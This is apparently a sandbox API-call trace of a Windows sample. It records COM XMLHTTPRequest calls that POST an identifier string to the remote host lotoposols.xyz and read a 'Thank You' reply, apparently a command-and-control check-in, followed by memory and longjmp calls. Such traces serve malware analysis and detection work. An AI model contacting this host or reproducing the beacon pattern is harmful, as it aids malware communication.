	[0234.000] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), ppvObject=0x26d870 | out: ppvObject=0x26d870*=0x0) returned 0x80004002
	[0234.000] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x2
	[0234.000] XMLHTTPRequest:IUnknown:Release (This=0x47a5c08) returned 0x0
	[0234.000] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914ccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d918 | out: ppvObject=0x26d918*=0x47a5aa0) returned 0x0
	[0234.000] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x3
	[0234.000] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x2
	[0234.000] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x1
	[0234.000] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x2
	[0234.000] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26dbf0 | out: ppvObject=0x26dbf0*=0x0) returned 0x80004002
	[0234.000] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x47a5aa0, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x26dd90*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x26db44 | out: rgDispId=0x26db44*=1) returned 0x0
	[0234.003] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x2
	[0234.003] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d8d0 | out: ppvObject=0x26d8d0*=0x0) returned 0x80004002
	[0234.004] XMLHTTPRequest:IDispatch:Invoke (in: This=0x47a5aa0, dispIdMember=1, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x1, pDispParams=0x26d8a8*(rgvarg=([0]=0x42be18*(varType=0xb, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x420000, varVal2=0x0), [1]=0x42be30*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42da90*(varType=0x8, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1="https://lotoposols.xyz", varVal2=0x0), varVal2=0x0), [2]=0x42be48*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42d958*(varType=0x8, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1="post", varVal2=0x0), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x26d8f0, puArgErr=0x26d8c0 | out: pDispParams=0x26d8a8*(rgvarg=([0]=0x42be18*(varType=0xb, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x420000, varVal2=0x0), [1]=0x42be30*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42da90*(varType=0x8, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1="https://lotoposols.xyz", varVal2=0x0), varVal2=0x0), [2]=0x42be48*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42d958*(varType=0x8, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1="post", varVal2=0x0), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x26d8f0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x26d8c0*=0x26dd90) returned 0x0
	[0234.004] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7feff44d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ce18 | out: ppvObject=0x26ce18*=0x0) returned 0x80004002
	[0234.004] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7feff426f70*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ce20 | out: ppvObject=0x26ce20*=0x0) returned 0x80004002
	[0234.004] XMLHTTPRequest:IUnknown:AddRef (This=0x3cacc0) returned 0x2
	[0234.004] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40c8070*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d000 | out: ppvObject=0x26d000*=0x3cacc0) returned 0x0
	[0234.004] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26be20 | out: ppvObject=0x26be20*=0x3cacc0) returned 0x0
	[0234.005] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d08d0*(Data1=0x75dd09cb, Data2=0x6c40, Data3=0x11d5, Data4=([0]=0x85, [1]=0x43, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xa0, [6]=0xfb, [7]=0xa3)), riid=0x7fef40b9ee8*(Data1=0xc, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26be58 | out: ppvObject=0x26be58*=0x0) returned 0x80004002
	[0234.005] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0870*(Data1=0xfc4801a1, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), riid=0x7fef40d0870*(Data1=0xfc4801a1, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x26be48 | out: ppvObject=0x26be48*=0x0) returned 0x80004002
	[0234.005] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0890*(Data1=0xb722be00, Data2=0x4e68, Data3=0x101b, Data4=([0]=0xa2, [1]=0xbc, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x40, [6]=0x47, [7]=0x70)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26be18 | out: ppvObject=0x26be18*=0x0) returned 0x80004002
	[0234.005] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26be18 | out: ppvObject=0x26be18*=0x0) returned 0x80004002
	[0234.005] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x3
	[0234.005] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40cbbe0*(Data1=0x2933bf81, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppvObject=0x26bef8 | out: ppvObject=0x26bef8*=0x0) returned 0x80004002
	[0234.005] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08c0*(Data1=0x118, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26bf08 | out: ppvObject=0x26bf08*=0x0) returned 0x80004002
	[0234.005] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26bef0 | out: ppvObject=0x26bef0*=0x3cacc0) returned 0x0
	[0234.005] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d08d0*(Data1=0x75dd09cb, Data2=0x6c40, Data3=0x11d5, Data4=([0]=0x85, [1]=0x43, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xa0, [6]=0xfb, [7]=0xa3)), riid=0x7fef40b9ee8*(Data1=0xc, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26bf20 | out: ppvObject=0x26bf20*=0x0) returned 0x80004002
	[0234.005] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40cbbe0*(Data1=0x2933bf81, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppvObject=0x26bef8 | out: ppvObject=0x26bef8*=0x0) returned 0x80004002
	[0234.005] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0890*(Data1=0xb722be00, Data2=0x4e68, Data3=0x101b, Data4=([0]=0xa2, [1]=0xbc, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x40, [6]=0x47, [7]=0x70)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26bf00 | out: ppvObject=0x26bf00*=0x0) returned 0x80004002
	[0234.005] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26bf00 | out: ppvObject=0x26bf00*=0x0) returned 0x80004002
	[0234.005] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x3
	[0234.005] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x2
	[0234.005] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26d018 | out: ppvObject=0x26d018*=0x3cacc0) returned 0x0
	[0234.006] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), ppvObject=0x26d010 | out: ppvObject=0x26d010*=0x0) returned 0x80004002
	[0234.006] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x2
	[0234.006] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x1
	[0234.006] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26dbf0 | out: ppvObject=0x26dbf0*=0x0) returned 0x80004002
	[0234.006] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x47a5aa0, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x26dd90*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x26db44 | out: rgDispId=0x26db44*=5) returned 0x0
	[0234.006] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x2
	[0234.006] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d8d0 | out: ppvObject=0x26d8d0*=0x0) returned 0x80004002
	[0234.006] XMLHTTPRequest:IDispatch:Invoke (in: This=0x47a5aa0, dispIdMember=5, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x1, pDispParams=0x26d8a8*(rgvarg=([0]=0x42be48*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42d9c0*(varType=0x8, wReserved1=0xa, wReserved2=0x0, wReserved3=0x0, varVal1="u=4565&id=plis&k=4565&u=4565", varVal2=0x0), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x26d8f0, puArgErr=0x26d8c0 | out: pDispParams=0x26d8a8*(rgvarg=([0]=0x42be48*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42d9c0*(varType=0x8, wReserved1=0xa, wReserved2=0x0, wReserved3=0x0, varVal1="u=4565&id=plis&k=4565&u=4565", varVal2=0x0), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x26d8f0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x26d8c0*=0x26dd90) returned 0x0
	[0234.007] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26cf48 | out: ppvObject=0x26cf48*=0x3cacc0) returned 0x0
	[0234.007] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7feff837e20*(Data1=0x79eac9e4, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), riid=0x7feff837e20*(Data1=0x79eac9e4, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x5a52f98 | out: ppvObject=0x5a52f98*=0x0) returned 0x80004002
	[0234.007] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x2
	[0234.007] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26ba48 | out: ppvObject=0x26ba48*=0x3cacc0) returned 0x0
	[0234.008] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7feff83f170*(Data1=0x4f9f9fcb, Data2=0xe0f4, Data3=0x48eb, Data4=([0]=0xb7, [1]=0xab, [2]=0xfa, [3]=0x2e, [4]=0xa9, [5]=0x36, [6]=0x5c, [7]=0xb4)), riid=0x7feff83f170*(Data1=0x4f9f9fcb, Data2=0xe0f4, Data3=0x48eb, Data4=([0]=0xb7, [1]=0xab, [2]=0xfa, [3]=0x2e, [4]=0xa9, [5]=0x36, [6]=0x5c, [7]=0xb4)), ppvObject=0x115888 | out: ppvObject=0x115888*=0x0) returned 0x80004002
	[0234.008] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x2
	[0244.280] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x1
	[0244.280] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26dbf8 | out: ppvObject=0x26dbf8*=0x0) returned 0x80004002
	[0244.280] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x47a5aa0, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x26dd10*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x26db4c | out: rgDispId=0x26db4c*=10) returned 0x0
	[0244.280] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x2
	[0244.280] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d8d0 | out: ppvObject=0x26d8d0*=0x0) returned 0x80004002
	[0244.280] XMLHTTPRequest:IDispatch:Invoke (in: This=0x47a5aa0, dispIdMember=10, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x26d8a8*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x42be60, pExcepInfo=0x26d8f0, puArgErr=0x26d8c0 | out: pDispParams=0x26d8a8*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x42be60*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="'Thank You: 5214462", varVal2=0x0), pExcepInfo=0x26d8f0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x26d8c0*=0x26dd90) returned 0x0
	[0244.281] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x1
	[0244.282] GetTickCount () returned 0x1171297
	[0244.282] GetTickCount () returned 0x1171297
	[0244.282] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d4a8 | out: ppvObject=0x26d4a8*=0x0) returned 0x80004002
	[0244.282] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x47a5aa0, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x26d5c0*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x26d3fc | out: rgDispId=0x26d3fc*=7) returned 0x0
	[0244.282] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x3
	[0244.282] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d180 | out: ppvObject=0x26d180*=0x0) returned 0x80004002
	[0244.282] XMLHTTPRequest:IDispatch:Invoke (in: This=0x47a5aa0, dispIdMember=7, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x26d158*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x42be18, pExcepInfo=0x26d1a0, puArgErr=0x26d170 | out: pDispParams=0x26d158*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x42be18*(varType=0x3, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xc8, varVal2=0x0), pExcepInfo=0x26d1a0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x26d170*=0x0) returned 0x0
	[0244.282] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x2
	[0244.283] ??3@YAXPEAX@Z () returned 0x3c3df301
	[0244.283] malloc (_Size=0xb0) returned 0x42e060
	[0244.283] ??2@YAPEAX_K@Z () returned 0x42c950
	[0244.284] ??3@YAXPEAX@Z () returned 0x8d00340001
	[0244.284] free (_Block=0x42e060) 
	[0244.284] ??3@YAXPEAX@Z () returned 0x3c3df301
	[0244.284] ??3@YAXPEAX@Z () returned 0xba00080001
	[0244.285] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d4a8 | out: ppvObject=0x26d4a8*=0x0) returned 0x80004002
	[0244.285] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x47a5aa0, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x26d5c0*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x26d3fc | out: rgDispId=0x26d3fc*=7) returned 0x0
	[0244.285] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x3
	[0244.285] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d180 | out: ppvObject=0x26d180*=0x0) returned 0x80004002
	[0244.286] XMLHTTPRequest:IDispatch:Invoke (in: This=0x47a5aa0, dispIdMember=7, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x26d158*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x42be18, pExcepInfo=0x26d1a0, puArgErr=0x26d170 | out: pDispParams=0x26d158*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x42be18*(varType=0x3, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xc8, varVal2=0x0), pExcepInfo=0x26d1a0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x26d170*=0xffffffff) returned 0x0
	[0244.286] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x2
	[0244.286] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x1
	[0244.286] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x0
	[0244.286] ??3@YAXPEAX@Z () returned 0x3c3df301
	[0244.289] longjmp () 
	[0244.289] longjmp () 
	[0244.289] longjmp () 
	[0244.290] GetCurrentThreadId () returned 0x9a8
	[0244.290] GetCurrentThreadId () returned 0x9a8
	[0244.290] ??2@YAPEAX_K@Z () returned 0x3e4000
	[0244.290] malloc (_Size=0x80) returned 0x3c88b0
	[0244.290] longjmp () 
	[0244.290] longjmp () 
	[0244.290] longjmp () 
	[0244.290] longjmp () 
	[0244.291] longjmp () 
	[0244.291] GetTickCount () returned 0x1171297
	[0244.291] longjmp () 
	[0244.291] longjmp () 
	[0244.292] longjmp () 
	[0244.292] longjmp () 
	[0244.292] longjmp () 
	[0244.292] longjmp () 
	[0244.293] longjmp () 
	[0244.293] longjmp () 
	[0244.293] longjmp () 
	[0244.293] longjmp () 
	[0244.294] longjmp () 
	[0244.294] longjmp () 
	[0244.294] longjmp () 
	[0244.294] longjmp () 
	[0244.294] longjmp () 
	[0244.295] longjmp () 
	[0244.295] longjmp () 
	[0244.295] longjmp () 
	[0244.295] longjmp () 
	[0244.295] longjmp () 
	[0244.296] longjmp () 
	[0244.296] longjmp () 
	[0244.296] longjmp () 
	[0244.296] longjmp () 
	[0244.296] longjmp () 
	[0244.297] longjmp () 
	[0244.297] longjmp () 
	[0244.297] longjmp () 
	[0244.297] longjmp () 
	[0244.298] longjmp () 
	[0244.298] longjmp () 
